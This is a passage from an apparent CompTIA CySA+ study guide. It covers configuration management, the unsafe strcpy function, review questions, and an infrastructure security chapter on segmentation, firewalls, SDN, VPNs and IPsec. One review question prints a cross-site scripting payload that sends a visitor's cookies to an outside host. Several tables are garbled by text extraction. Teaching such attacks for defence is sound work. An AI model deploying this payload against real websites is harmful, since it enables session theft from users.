documented, and all network diagrams, both logical and
physical, must be updated constantly and consistently to
accurately reflect the state of each configuration now and not as
it was two years ago. Verifying that all configuration
management policies are being followed should be an ongoing
process.
In many cases it is beneficial to form a configuration control
board. The tasks of the configuration control board can include
the following:
Ensuring that changes made are approved, tested, documented, and
implemented correctly.
Meeting periodically to discuss configuration status accounting
reports.
Maintaining responsibility for ensuring that changes made do not
jeopardize the soundness of the verification system.
In summary, the components of configuration management are
as follows:
Configuration control
Configuration status accounting
Configuration audit
Use of Insecure Functions
Software developers use functions to make things happen in
software. Some functions are more secure than others (although
some programmers will tell you they are all safe if used
correctly). Developers should research, identify, and avoid those
functions that are known to cause security issues.
strcpy
One function that has a reputation for issues is the strcpy
function in C++. It copies the C string pointed by source into
the array pointed by destination, including the terminating null
character (and stopping at that point). The issue is that if the
destination is not long enough to contain the string, an overrun
occurs.
To avoid overflows, the size of the array pointed by destination
shall be long enough to contain the same C string as source
(including the terminating null character), and should not
overlap in memory with source.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 7-3
lists a reference of these key topics and the page numbers on
which each is found.
Table 7-3 Key Topics in Chapter 7
Key Topic Element
Description
Page Number
Bulleted
list
Criteria used by XACML to provide finegrained control
14
3
Bulleted
list
XACML components
14
4
Figure 72
XACML flow
14
5
Figure 73
SQL injection
14
6
Example
7-1
Log entry with SQL injection attack
14
6
Bulleted
list
SQL injection prevention measures
14
6
Example
7-2
Packet with NOP slide within
14
7
Example
7-3
Buffer overflow attack
14
9
Bulleted
list
Mitigating integer overflow attacks
14
9
Figure 7-
Heap overflow
15
4
0
Figure 75
Remote code execution
15
1
Figure 76
Directory traversal
15
1
Bulleted
List
Privilege Escalation
15
2
Figure 77
Password spraying
15
3
Figure 78
Credential stuffing
15
3
Bulleted
list
Preventing credential stuffing
15
4
Bulleted
list
Mitigating ARP poisoning
15
4
Figure 712
Session highjack
15
9
Bulleted
list
Actions a rootkit can take
15
9
Bulleted
list
Rootkit prevention
16
0
Figure 713
High-Level View of a Typical XSS Attack
16
0
Figure 714
Reflected XSS Attack
16
1
Figure 715
Persistent XSS Attack
16
2
Figure 716
DOM-Based XSS Attack
16
2
Bulleted
list
Measures to prevent disclosure of sensitive
information
16
5
Bulleted
list
Measures to reduce risk from reusing
components
16
6
Bulleted
list
Functions of configuration management
16
7
Bulleted
list
Configuration control board tasks
16
8
Bulleted
list
Components of configuration management
16
8
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
Extensible Markup Language (XML) attack
eXtensible Access Control Markup Language (XACML)
policy enforcement point (PEP)
policy decision point (PDP)
Structured Query Language (SQL) injection
overflow attacks
buffer overflow
integer overflow
Privilege Escalation
heap overflows
remote code execution
directory traversal
privilege escalation
password spraying
credential stuffing
man-in-the-middle attack
Dynamic ARP Inspection (DAI)
DHCP snooping
session hijacking
rootkit
cross-site scripting (XSS)
reflective XSS
persistent XSS
DOM XSS
dereference
insecure object reference
race condition
strcpy
REVIEW QUESTIONS
1. In XACML, the entity that is protecting the resource that the
subject (a user or an application) is attempting to access is
called the ____________
2. Match the following terms with their definitions
Terms
X
A
C
M
L
Definitions
Type of attack that can result in reading sensitive data from
the database, modifying database data, and executing
administrative operations on the database
P
D
P
When an area of memory of some sort is full and can hold
no more information
S
Q
L
in
je
ct
io
n
Retrieves all applicable polices in XACML and compares the
request with the policies
O
v
er
fl
o
w
A standard for an access control policy language using XML
3. List at least one of the criteria used by XACML to provide
for fine-grained control of activities.
4. _________________________ occurs when math
operations try to create a numeric value that is too large for
the available space.
5. Match the following terms with their definitions.
Terms
Definitions
Heap
One of the ways malicious individuals are able to
access parts of a directory to which they should
not have access
Directory
traversal
Technique used to identify the passwords of
domain users
Password
spraying
Feature that can prevent man-in-the-middle
attacks
Dynamic
ARP
Inspection
(DAI)
An area of memory that can be increased or
decreased in size
6. List at least one way that sessions can be highjacked.
7. What is the following script designed to do?
Click here to view code image
<SCRIPT> document.location='http://site.comptia/cgi-bin/scri
cgi?'+document. cookie </SCRIPT>
8. Match the following terms with their definitions.
Terms
Definitions
Impr
oper
error
hand
ling
Can allow an attacker to use the resulting exception to
bypass security logic
Dere
feren
cing
Can cause disclosure of information
Race
cond
ition
Configuration in which settings from the factory have not
been changed
Defa
ult
confi
An attack in which the hacker inserts himself between
instructions, introduces changes, and alters the order of
gura
tion
execution of the instructions, thereby altering the
outcome
9. List at least one of the functions of configuration
management.
10. ____________________ is a function that has a
reputation for issues in C++.
Chapter 8
Security Solutions for
Infrastructure
Management
This chapter covers the following topics related to Objective 2.1
(Given a scenario, apply security solutions for infrastructure
management) of the CompTIA Cybersecurity Analyst (CySA+)
CS0-002 certification exam:
Cloud vs. on-premises: Discusses the two main infrastructure
models: cloud vs. on-premises.
Asset management: Covers issues surrounding asset
management including asset tagging.
Segmentation: Describes physical and virtual segmentation,
jumpboxes, and system isolation with an air gap.
Network architecture: Covers physical, software-defined, virtual
private cloud (VPC), virtual private network (VPN), and serverless
architectures.
Change management: Discusses the formal change management
processes.
Virtualization: Focuses on virtual desktop infrastructure (VDI).
Containerization: Discusses an alternate form of virtualization.
Identity and access management: Explores privilege
management, multifactor authentication (MFA), single sign-on
(SSO), federation, role-based access control, attribute-based access
control, mandatory access control, and manual review.
Cloud access security broker (CASB): Discusses the role of
CASBs.
Honeypot: Covers placement and use of honeypots.
Monitoring and logging: Explains monitoring and logging
processes.
Encryption: Introduces important types of encryption.
Certificate management: Discusses issues critical to managing
certificates.
Active defense: Discusses defensive strategy in the cybersecurity
arena.
Over the years, security solutions have been adopted,
discredited, and replaced as technology changes. Cybersecurity
professionals must know and understand the pros and cons of
various approaches to protect the infrastructure. This chapter
examines both old and new solutions.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these 14 self-assessment questions, you might want
to skip ahead to the “Exam Preparation Tasks” section. Table 81 lists the major headings in this chapter and the “Do I Know
This Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these specific
areas. The answers to the “Do I Know This Already?” quiz
appear in Appendix A.
Table 8-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Question
Cloud vs. On-premises
1
Asset Management
2
Segmentation
3
Network Architecture
4
Change Management
5
Virtualization
6
Containerization
7
Identity and Access Management
8
Cloud Access Security Broker (CASB)
9
Honeypot
10
Monitoring and Logging
11
Encryption
12
Certificate Management
13
Active Defense
14
1. Which statement is false with respect to multitenancy in a
cloud?
1. It can lead to allowing another tenant or attacker to see others’
data or to assume the identity of other clients.
2. It prevents residual data of former tenants from being exposed in
storage space assigned to new tenants.
3. Users may lose access due to inadequate redundancy and faulttolerance measures.
4. Shared ownership of data with the customer can limit the legal
liability of the provider.
2. Which of the following involves marking a video, photo, or
other digital media with a GPS location?
1. TAXII
2. Geotagging
3. Geofencing
4. RFID
3. Which of the following is a network logically separate from
the other networks where resources that will be accessed
from the outside world are made available to only those that
are authenticated?
1. Intranet
2. DMZ
3. Extranet
4. Internet
4. Which of the following terms refers to any device exposed
directly to the Internet or to any untrusted network?
1. Screened subnet
2. Three-legged firewall
3. Bastion host
4. Screened host
5. Which statement is false regarding the change management
process?
1. All changes should be formally requested.
2. Each request should be approved as quickly as possible.
3. Prior to formal approval, all costs and effects of the methods of
implementation should be reviewed.
4. After they’re approved, the change steps should be developed.
6. Which of the following is installed on hardware and is
considered as “bare metal”?
1. Type 1 hypervisor
2. VMware Workstation
3. Type 2 hypervisor
4. Oracle VirtualBox
7. Which of the following is a technique in which the kernel
allows for multiple isolated user space instances?
1. Containerization
2. Segmentation
3. Affinity
4. Secure Boot
8. Which of the following authentication factors represents
something a person is?
1. Knowledge factor
2. Ownership factor
3. Characteristic factor
4. Location factor
9. Which of the following is a software layer that operates as a
gatekeeper between an organization’s on-premises network
and the provider’s cloud environment?
1. Virtual router
2. CASB
3. Honeypot
4. Black hole
10. Which of the following is the key purpose of a honeypot?
1. Loss minimization
2. Information gathering
3. Confusion
4. Retaliation
11. Which of the following relates to logon and information
security continuous monitoring?
1. IEEE 802.ac
2. IOC/IEC 27017
3. NIST SP 800-137
4. FIPS
12. Which of the following cryptographic techniques provides
the best method of ensuring integrity and determines if data
has been altered?
1. Encryption
2. Hashing
3. Digital signature
4. Certificate pinning
13. Which of the following PKI components verifies the
requestor’s identity and registers the requestor?
1. TA
2. CA
3. RA
4. BA
14. Which of the following is a new approach to security that is
offensive in nature rather than defensive?
1. Hunt teaming
2. White teaming
3. Blue teaming
4. APT
FOUNDATION TOPICS
CLOUD VS. ON-PREMISES
Accompanying the movement to virtualization is a movement
toward the placement of resources in a cloud environment.
While the cloud allows users to access the resources from
anywhere they can get Internet access, it presents a security
landscape that differs from the security landscape of your onpremises resources. For one thing, a public cloud solution relies
on the security practices of the provider.
These are the biggest risks you face when placing resources in a
public cloud:
Multitenancy can lead to the following:
Allowing another tenant or attacker to see others’ data or to
assume the identity of other clients
Residual data of former tenants exposed in storage space
assigned to new tenants
The use of virtualization in cloud environments leads to the same
issues covered later in this chapter in the section “Virtualization.”
Mechanisms for authentication and authorization may be improper
or inadequate.
Users may lose access due to inadequate redundancy and faulttolerance measures.
Shared ownership of data with the customer can limit the legal
liability of the provider.
The provider may use data improperly (such as data mining).
Data jurisdiction is an issue: Where does the data actually reside,
and what laws affect it, based on its location?
Cloud Mitigations
Over time, best practices have emerged to address both cloud
and on-premises environments. With regard to cloud it is
incumbent on the customer to take an active role in ensuring
security, including
Understand you share responsibility for security with the vendor
Ask, don’t assume, with regard to detailed security questions
Deploy an identity and access management solution that supports
cloud
Train your staff
Establish and enforce cloud security policies
Consider a third-party partner if you don’t have the skill sets to
protect yourself
ASSET MANAGEMENT
Asset management and inventory control across the technology
life cycle are critical to ensuring that assets are not stolen or lost
and that data on assets is not compromised in any way. Asset
management and inventory control are two related areas. Asset
management involves tracking the devices that an organization
owns, and inventory control involves tracking and containing
inventory. All organizations should implement asset
management, but not all organizations need to implement
inventory control.
Asset Tagging
Asset tagging is the process of placing physical identification
numbers of some sort on all assets. This can be as simple as a
small label that identifies the asset and the owner, as shown in
Figure 8-1.
Figure 8-1 Asset Tag
Asset tagging can also be a part of more robust asset-tracking
system when implemented in such a way that the device can be
tracked and located at any point in time. Let’s delve into the
details of such systems.
Device-Tracking Technologies
Device-tracking technologies allow organizations to determine
the location of a device and also often allow the organization to
retrieve the device. However, if the device cannot be retrieved, it
may be necessary to wipe the device to ensure that the data on
the device cannot be accessed by unauthorized users. As a
security practitioner, you should stress to your organization the
need to implement device-tracking technologies and remotewiping capabilities.
Geolocation/GPS Location
Device-tracking technologies include geolocation, or Global
Positioning System (GPS) location. With this technology,
location and time information about an asset can be tracked,
provided that the appropriate feature is enabled on the device.
For most mobile devices, the geolocation or GPS location
feature can be enhanced through the use of Wi-Fi networks. A
security practitioner must ensure that the organization enacts
mobile device security policies that include the mandatory use
of GPS location features. In addition, it will be necessary to set
up appropriate accounts that allow personnel to use the
vendor’s online service for device location. Finally, remotelocking and remote-wiping features should be seriously
considered, particularly if the mobile devices contain
confidential or private information.
Object-Tracking and Object-Containment Technologies
Object-tracking and object-containment technologies are
primarily concerned with ensuring that inventory remains
within a predefined location or area. Object-tracking
technologies allow organizations to determine the location of
inventory. Object-containment technologies alert personnel
within the organization if inventory has left the perimeter of the
predefined location or area.
For most organizations, object-tracking and object-containment
technologies are used only for inventory assets above a certain
value. For example, most retail stores implement objectcontainment technologies for high-priced electronics devices
and jewelry. However, some organizations implement these
technologies for all inventory, particularly in large warehouse
environments.
Technologies used in this area include geotagging/geofencing
and RFID.
Geotagging/Geofencing
Geotagging involves marking a video, photo, or other digital
media with a GPS location. This feature has received criticism
recently because attackers can use it to pinpoint personal
information, such as the location of a person’s home. However,
for organizations, geotagging can be used to create locationbased news and media feeds. In the retail industry, geotagging
can be helpful for allowing customers to locate a store where a
specific piece of merchandise is available.
Geofencing uses the GPS to define geographical boundaries. A
geofence is a virtual barrier, and alerts can occur when
inventory enters or exits the boundary. Geofencing is used in
retail management, transportation management, human
resources management, law enforcement, and other areas.
RFID
Radio frequency identification (RFID) uses radio
frequency chips and readers to manage inventory. The chips are
placed on individual pieces or pallets of inventory. RFID readers
are placed throughout the location to communicate with the
chips. Identification and location information are collected as
part of the RFID communication. Organizations can customize
the information that is stored on an RFID chip to suit their
needs.
Two types of RFID systems can be deployed: active
reader/passive tag (ARPT) and active reader/active tag (ARAT).
In an ARPT system, the active reader transmits signals and
receives replies from passive tags. In an ARAT system, active
tags are woken with signals from the active reader.
RFID chips can be read only if they are within a certain
proximity of the RFID reader. A recent implementation of RFID
chips is the Walt Disney MagicBand, which is issued to visitors
at Disney resorts and theme parks. The band verifies park
admission and allows visitors to reserve attraction restaurant
times and pay for purchases in the resort.
Different RFID systems are available for different wireless
frequencies. If your organization decides to implement RFID, it
is important that you fully research the advantages and
disadvantages of different frequencies.
SEGMENTATION
One of the best ways to protect sensitive resources is to utilize
network segmentation. When you segment a network, you
create security zones that are separated from one another by
devices such as firewalls and routers that can be used to control
the flow of traffic between the zones.
Physical
Physical segmentation is a tried and true method of
segmentation. While there is no limit to the number of zones
you can create in general, most networks have the zone types
discussed in the following sections.
LAN
Let’s talk about what makes a local-area network (LAN) local.
Although classically we think of a LAN as a network located in
one location, such as a single office, referring to a LAN as a
group of systems that are connected with a fast connection is
more correct. For purposes of this discussion, that is any
connection over 10 Mbps. This might not seem very fast to you,
but it is fast compared to a wide-area network (WAN). Even a
T1 connection is only 1.544 Mbps. Using this as our yardstick, if
a single campus network has a WAN connection between two
buildings, then the two networks are considered two LANs
rather than a single LAN. In most cases, however, networks in a
single campus are typically not connected with a WAN
connection, which is why usually you hear a LAN defined as a
network in a single location.
Intranet
Within the boundaries of a single LAN, there can be
subdivisions for security purposes. The LAN might be divided
into an intranet and an extranet. The intranet is the internal
network of the enterprise. It is considered a trusted network
and typically houses any sensitive information and systems and
should receive maximum protection with firewalls and strong
authentication mechanisms.
Extranet
An extranet is a network logically separate from the intranet
where resources that will be accessed from the outside world are
made available to authorized, authenticated third parties.
Access might be granted to customers, or business partners. All
traffic between the extranet and the intranet should be closely
monitored and securely controlled. Nothing of a sensitive
nature should be placed in the extranet.
DMZ
Like an extranet, a demilitarized zone (DMZ) is a network
logically separate from the intranet where resources that will be
accessed from the outside world are made available. The
difference is that usually an extranet contains resources
available only to certain entities from the outside world, and
access is secured with authentication, whereas a DMZ usually
contains resources available to everyone from the outside world,
without authentication. A DMZ might contain web servers,
email servers, or DNS servers. Figure 8-2 shows the relationship
between intranet, extranet, Internet, and DMZ networks.
FIGURE 8-2 Network Segmentation
Virtual
While all the network segmentation components discussed thus
far separate networks physically with devices such as routers
and firewalls, a virtual local-area network (VLAN)
separates them logically. Enterprise-level switches are capable
of creating VLANs. These are logical subdivisions of a switch
that segregates ports from one another as if they were in
different LANs. VLANs can also span multiple switches,
meaning that devices connected to switches in different parts of
a network can be placed in the same VLAN, regardless of
physical location.
A VLAN adds a layer of separation between sensitive devices
and the rest of the network. For example, if only two devices
should be able to connect to the HR server, the two devices and
the HR server could be placed in a VLAN separate from the
other VLANs. Traffic between VLANs can only occur through a
router. Routers can be used to implement access control lists
(ACLs) that control the traffic allowed between VLANs. Figure
8-3 shows an example of a network with VLANs.
FIGURE 8-3 VLANs
VLANs can be used to address threats that exist within a
network, such as the following:
DoS attacks: When you place devices with sensitive information
in a separate VLAN, they are shielded from both Layer 2 and Layer
3 DoS attacks from devices that are not in that VLAN. Because
many of these attacks use network broadcasts, if they are in a
separate VLAN, they will not receive broadcasts unless they
originate from the same VLAN.
Unauthorized access: While permissions should be used to
secure resources on sensitive devices, placing those devices in a
secure VLAN allows you to deploy ACLs on the router to allow only
authorized users to connect to the device.
Jumpbox
A jumpbox, or jump server, is a server that is used to access
devices that have been placed in a secure network zone such as
a DMZ. The server would span the two networks to provide
access from an administrative desktop to the managed device.
Secure Shell (SSH) tunneling is common as the de facto method
of access. Administrators can use multiple zone-specific
jumpboxes to access what they need, and lateral access between
servers is prevented by whitelists. This helps prevent the types
of breaches suffered by both Target and Home Depot, in which
lateral access was used to move from one compromised device
to other servers. Figure 8-4 shows a jumpbox (jump server)
arrangement.
Figure 8-4 Jumpboxes
A jumpbox arrangement can avoid the following issues:
Breaches that occur from lateral access
Inappropriate administrative access of sensitive servers
System Isolation
While the safest device is one that is not connected to any
networks, disconnecting devices is typically not a workable
solution if you need to access the data on a system. However,
there are some middle-ground solutions between total isolation
and total access. Systems can be isolated from other systems
through the control of communications with the device. An
example of system isolation is through the use of Microsoft
server isolation. By leveraging Group Policy (GP) settings, you
can require that all communication with isolated servers must
be authenticated and protected (and optionally encrypted as
well) by using IPsec. As Group Policy settings can only be
applied to computers that are domain members, computers that
are not domain members must be specified as exceptions to the
rules controlling access to the device if they need access. Figure
8-5 shows the results of three different types of devices
attempting to access an isolated server. The non-domain device
(unmanaged) cannot connect, while the unmanaged device that
has been excepted can, and the domain member that lies within
the isolated domain can also.
FIGURE 8-5 Server Isolation
The device that is a domain member (Computer1) with the
proper Group Policy settings to establish an authenticated
session is allowed access. The computer that is not a domain
member but has been excepted is allowed an unauthenticated
session. Finally, a device missing the proper GP settings to
establish an authenticated session is not allowed access. This is
just one example of how devices can be isolated.
Air Gap
In cases where data security concerns are extreme, it may even
be advisable to protect the underlying system with an air gap.
This means the device has no network connections and all
access to the system must be done manually by adding and
removing items such as updates and patches with a flash drive
or other external device.
Any updates to the data on the device must be done manually,
using external media. An example of when it might be
appropriate to do so is in the case of a certificate authority (CA)
root server. If a root CA is in some way compromised (broken
into, hacked, stolen, or accessed by an unauthorized or
malicious person), all the certificates that were issued by that
CA are also compromised.
NETWORK ARCHITECTURE
Network architecture refers not only to the components that are
arranged and connected to one another (physical architecture)
but also to the communication paths the network uses (logical
architecture). This section surveys security considerations for a
number of different architectures that can be implemented both
physically and virtually.
Physical
The physical network comprises the physical devices and their
connections to one another. The physical network in many cases
serves as an underlay or carrier for higher-level network
processes and protocols.
Security practitioners must understand two main types of
enterprise deployment diagrams:
Logical deployment diagram: Shows the architecture, including
the domain architecture, with the existing domain hierarchy,
names, and addressing scheme; server roles; and trust
relationships.
Physical deployment diagram: Shows the details of physical
communication links, such as cable length, grade, and wiring paths;
servers, with computer name, IP address (if static), server role, and
domain membership; device location, such as printer, hub, switch,
modem, router, or bridge, as well as proxy location; communication
links and the available bandwidth between sites; and the number of
users, including mobile users, at each site.
A logical diagram usually contains less information than a
physical diagram. While you can often create a logical diagram
from a physical diagram, it is nearly impossible to create a
physical diagram from a logical one.
Figure 8-6 shows an example of a logical network diagram.
Figure 8-6 Logical Network Diagram
As you can see, the logical network diagram shows only a few of
the servers in the network, the services they provide, their IP
addresses, and their DNS names. The relationships between the
different servers are shown by the arrows between them. Figure
8-7 shows an example of a physical network diagram.
FIGURE 8-7 Physical Network Diagram
A physical network diagram gives much more information than
a logical one, including the cabling used, the devices on the
network, the pertinent information for each server, and other
connection information.
Note
CySA+ firewall-related objectives including firewall logs, web application
firewalls (WAFs), and implementing configuration changes to firewalls are
covered later in the book in Chapter 11, “Analyzing Data as Part of Security
Monitoring Activities.”
Firewall Architecture
Whereas the type of firewall speaks to the internal operation of
the firewall, the architecture refers to the way in which firewalls
are deployed in the network to form a system of protection. The
following sections look at the various ways firewalls can be
deployed.
Bastion Hosts
A bastion host may or may not be a firewall. The term actually
refers to the position of any device. If the device is exposed
directly to the Internet or to any untrusted network while
screening the rest of the network from exposure, it is a bastion
host. Some other examples of bastion hosts are FTP servers,
DNS servers, web servers, and email servers. In any case where
a host must be publicly accessible from the Internet, the device
must be treated as a bastion host, and you should take the
following measures to protect these machines:
Disable or remove all unnecessary services, protocols, programs,
and network ports.
Use authentication services separate from those of the trusted hosts
within the network.
Remove as many utilities and system configuration tools as is
practical.
Install all appropriate service packs, hotfixes, and patches.
Encrypt any local user account and password databases.
A bastion host can be located in the following locations:
Behind the exterior and interior firewalls: Locating it here
and keeping it separate from the interior network complicates the
configuration but is safest.
Behind the exterior firewall only: Perhaps the most common
location for a bastion host is separated from the internal network;
this is a less complicated configuration. Figure 8-8 shows an
example in which there are two bastion hosts: the FTP/WWW
server and the SMTP/DNS server.
As both the exterior firewall and a bastion host: This setup
exposes the host to the most danger.
Figure 8-8 Bastion Hosts in a Screened Subnet
Dual-Homed Firewalls
A dual-homed firewall has two network interfaces: one
pointing to the internal network and another connected to the
untrusted network. In many cases, routing between these
interfaces is turned off. The firewall software allows or denies
traffic between the two interfaces based on the firewall rules
configured by the administrator. The following are some of the
advantages of this setup:
The configuration is simple.
It is possible to perform IP masquerading (NAT).
It is less costly than using two firewalls.
Disadvantages include the following:
There is a single point of failure.
It is not as secure as other options.
Figure 8-9 shows a dual-homed firewall (also called a dualhomed host) location.
Figure 8-9 Location of Dual-Homed Firewall
Multihomed Firewall
A firewall can be multihomed. One popular type of
multihomed firewall is the three-legged firewall. In this
configuration, there are three interfaces: one connected to the
untrusted network, one connected to the internal network, and
one connected to a DMZ. As mentioned earlier in this chapter, a
DMZ is a protected network that contains systems needing a
higher level of protection. The advantages of a three-legged
firewall include the following:
It offers cost savings on devices because you need only one firewall
and not two or three.
It is possible to perform IP masquerading (NAT) on the internal
network while not doing so for the DMZ.
Among the disadvantages are the following:
The complexity of the configuration is increased.
There is a single point of failure.
The location of a three-legged firewall is shown in Figure 8-10.
Figure 8-10 Location of a Three-legged Firewall
Screened Host Firewalls
A screened host firewall is located between the final router
and the internal network. The advantages to a screened host
firewall solution include the following:
It offers more flexibility than a dual-homed firewall because rules
rather than an interface create the separation.
Potential cost savings.
The disadvantages include the following:
The configuration is more complex.
It is easier to violate the policies than with dual-homed firewalls.
Figure 8-11 shows the location of a screened host firewall.
Figure 8-11 Location of a Screened Host Firewall
Screened Subnets
In a screened subnet, two firewalls are used, and traffic must
be inspected at both firewalls before it can enter the internal
network. The advantages of a screened subnet include the
following:
It offers the added security of two firewalls before the internal
network.
One firewall is placed before the DMZ, protecting the devices in the
DMZ.
Disadvantages include the following:
It is more costly than using either a dual-homed or three-legged
firewall.
Configuring two firewalls adds complexity.
Figure 8-12 shows the placement of the firewalls to create a
screened subnet. The router is acting as the outside firewall, and
the firewall appliance is the second firewall. In any situation
where multiple firewalls are in use, such as an active/passive
cluster of two firewalls, care should be taken to ensure that TCP
sessions are not traversing one firewall while return traffic of
the same session is traversing the other. When stateful filtering
is being performed, the return traffic will be denied, which will
break the user connection. In the real world, various firewall
approaches are mixed and matched to meet requirements, and
you may find elements of all these architectural concepts being
applied to a specific situation.
FIGURE 8-12 Location of a Screened Subnet
Software-Defined Networking
In a network, three planes typically form the networking
architecture:
Control plane: This plane carries signaling traffic originating
from or destined for a router. This is the information that allows
routers to share information and build routing tables.
Data plane: Also known as the forwarding plane, this plane
carries user traffic.
Management plane: This plane administers the router.
Software-defined networking (SDN) has been classically
defined as the decoupling of the control plane and the data
plane in networking. In a conventional network, these planes
are implemented in the firmware of routers and switches. SDN
implements the control plane in software, which enables
programmatic access to it.
This definition has evolved over time to focus more on
providing programmatic interfaces to networking equipment
and less on the decoupling of the control and data planes. An
example of this is the provision of application programming
interfaces (APIs) by vendors into the multiple platforms they
sell.
One advantage of SDN is that it enables very detailed access
into, and control over, network elements. It allows IT
organizations to replace a manual interface with a
programmatic one that can enable the automation of
configuration and policy management.
An example of the use of SDN is using software to centralize the
control plane of multiple switches that normally operate
independently. (While the control plane normally functions in
hardware, with SDN it is performed in software.) Figure 8-13
illustrates this concept.
FIGURE 8-13 Centralized and Decentralized SDN
The advantages of SDN include the following:
Mixing and matching solutions from different vendors is simple.
SDN offers choice, speed, and agility in deployment.
The following are disadvantages of SDN:
Loss of connectivity to the controller brings down the entire
network.
SDN can potentially allow attacks on the controller.
Virtual SAN
A virtual storage area network (VSAN) is a softwaredefined storage method that allows pooling of storage
capabilities and instant and automatic provisioning of virtual
machine storage. This is a method of software-defined storage
(SDS). It usually includes dynamic tiering, QoS, caching,
replication, and cloning. Data availability is ensured through
the software, not by implementing redundant hardware.
Administrators are able to define policies that allow the
software to determine the best placement of data. By including
intelligent data placement, software-based controllers, and
software RAID, a VSAN can provide better data protection and
availability than traditional hardware-only options.
Virtual Private Cloud (VPC)
In Chapter 6, “Threats and Vulnerabilities Associated with
Operating in the Cloud,” you learned about cloud deployment
models, one of which was the hybrid model. A type of hybrid
model is the virtual private cloud (VPC) model. In this
model, a public cloud provider isolates a specific portion of its
public cloud infrastructure to be provisioned for private use.
How does this differ from a standard private cloud? VPCs are
private clouds sourced over a third-party vendor infrastructure
rather than over an enterprise IT infrastructure. Figure 8-14
illustrates this architecture.
Figure 8-14 Virtual Private Cloud
Virtual Private Network (VPN)
A virtual private network (VPN) allows external devices to
access an internal network by creating a tunnel over the
Internet. Traffic that passes through the VPN tunnel is
encrypted and protected. An example of a network with a VPN
is shown in Figure 8-15. In a VPN deployment, only computers
that have the VPN client and are able to authenticate will be
able to connect to the internal resources through the VPN
concentrator.
VPN connections use an untrusted carrier network but provide
protection of the information through strong authentication
protocols and encryption mechanisms. While we typically use
the most untrusted network, the Internet, as the classic
example, and most VPNs do travel through the Internet, a VPN
can be used with interior networks as well whenever traffic
needs to be protected from prying eyes.
FIGURE 8-15 VPN
In VPN operations, entire protocols wrap around other
protocols when this process occurs. They include
A LAN protocol (required)
A remote access or line protocol (required)
An authentication protocol (optional)
An encryption protocol (optional)
A device that terminates multiple VPN connections is called a
VPN concentrator. VPN concentrators incorporate the most
advanced encryption and authentication techniques available.
In some instances, VLANs in a VPN solution may not be
supported by the ISP if they are also using VLANs in their
internal network. Choosing a provider that provisions
Multiprotocol Label Switching (MPLS) connections can allow
customers to establish VLANs to other sites. MPLS provides
VPN services with address and routing separation between
VPNs.
VPN connections can be used to provide remote access to
teleworkers or traveling users (called remote-access VPNs) and
can also be used to securely connect two locations (called siteto-site VPNs). The implementation process is conceptually
different for these two VPN types. In a remote-access VPN, the
tunnel that is created has as its endpoints the user’s computer
and the VPN concentrator. In this case, only traffic traveling
from the user computer to the VPN concentrator uses this
tunnel. In the case of two office locations, the tunnel endpoints
are the two VPN routers, one in each office. With this
configuration, all traffic that goes between the offices uses the
tunnel, regardless of the source or destination. The endpoints
are defined during the creation of the VPN connection and thus
must be set correctly according to the type of remote-access link
being used.
Two protocols commonly used to create VPN connections are
IPsec and SSL/TLS. The next section discusses these two
protocols
IPsec
Internet Protocol Security (IPsec) is a suite of protocols used in
various combinations to secure VPN connections. Although it
provides other services, it is an encryption protocol. Before we
look at IPsec, let’s look at several remote-access or line
protocols (tunneling protocols) used to create VPN connections,
including
Point-to-Point Tunneling Protocol (PPTP): PPTP is a
Microsoft protocol based on PPP. It uses built-in Microsoft Pointto-Point encryption and can use a number of authentication
methods, including CHAP, MS-CHAP, and EAP-TLS. One
shortcoming of PPTP is that it only works on IP-based networks. If
a WAN connection that is not IP based is in use, L2TP must be
used.
Layer 2 Tunneling Protocol (L2TP): L2TP is a newer protocol
that operates at Layer 2 of the OSI model. Like PPTP, L2TP can use
various authentication mechanisms; however, L2TP does not
provide any encryption. It is typically used with IPsec, which is a
very strong encryption mechanism.
When using PPTP, the encryption is included, and the only
remaining choice to be made is the authentication protocol.
When using L2TP, both encryption and authentication
protocols, if desired, must be added. IPsec can provide
encryption, data integrity, and system-based authentication,
which makes it a flexible and capable option. By implementing
certain parts of the IPsec suite, you can either use these features
or not.
Internet Protocol Security (IPsec) includes the following
components:
Authentication Header (AH): AH provides data integrity, data
origin authentication, and protection from replay attacks.
Encapsulating Security Payload (ESP): ESP provides all that
AH does as well as data confidentiality.
Internet Security Association and Key Management
Protocol (ISAKMP): ISAKMP handles the creation of a security
association (SA) for the session and the exchange of keys.
Internet Key Exchange (IKEv2): Also sometimes referred to as
IPsec Key Exchange, IKE provides the authentication material used
to create the keys exchanged by ISAKMP during peer
authentication. This was proposed to be performed by a protocol
called Oakley that relied on the Diffie-Hellman algorithm, but
Oakley has been superseded by IKEv2.
IPsec is a framework, which means it does not specify many of
the components used with it. These components must be
identified in the configuration, and they must match in order for
the two ends to successfully create the required SA that must be
in place before any data is transferred. The following selections
must be made:
The encryption algorithm, which encrypts the data
The hashing algorithm, which ensures that the data has not been
altered and verifies its origin
The mode, which is either tunnel or transport
The protocol, which can be AH, ESP, or both
All these settings must match on both ends of the connection. It
is not possible for the systems to select these on the fly. They
must be preconfigured correctly in order to match.
When configured in tunnel mode, the tunnel exists only
between the two gateways, but all traffic that passes through the
tunnel is protected. This is normally done to protect all traffic
between two offices. The SA is between the gateways between
the offices. This is the type of connection that would be called a
site-to-site VPN.
The SA between the two endpoints is made up of the security
parameter index (SPI) and the AH/ESP combination. The SPI, a
value contained in each IPsec header, helps the devices
maintain the relationship between each SA (and there could be
several happening at once) and the security parameters (also
called the transform set) used for each SA.
Each session has a unique session value, which helps prevent
Reverse engineering
Content modification
Factoring attacks (in which the attacker tries all the combinations of
numbers that can be used with the algorithm to decrypt ciphertext)
With respect to authenticating the connection, the keys can be
preshared or derived from a public key infrastructure (PKI). A
PKI creates public/private key pairs that are associated with
individual users and computers that use a certificate. These key
pairs are used in the place of preshared keys in that case.
Certificates that are not derived from a PKI can also be used.
In transport mode, the SA is either between two end stations or
between an end station and a gateway or remote access server.
In this mode, the tunnel extends from computer to computer or
from computer to gateway. This is the type of connection that
would be used for a remote-access VPN. This is but one
application of IPsec.
When the communication is from gateway to gateway or host to
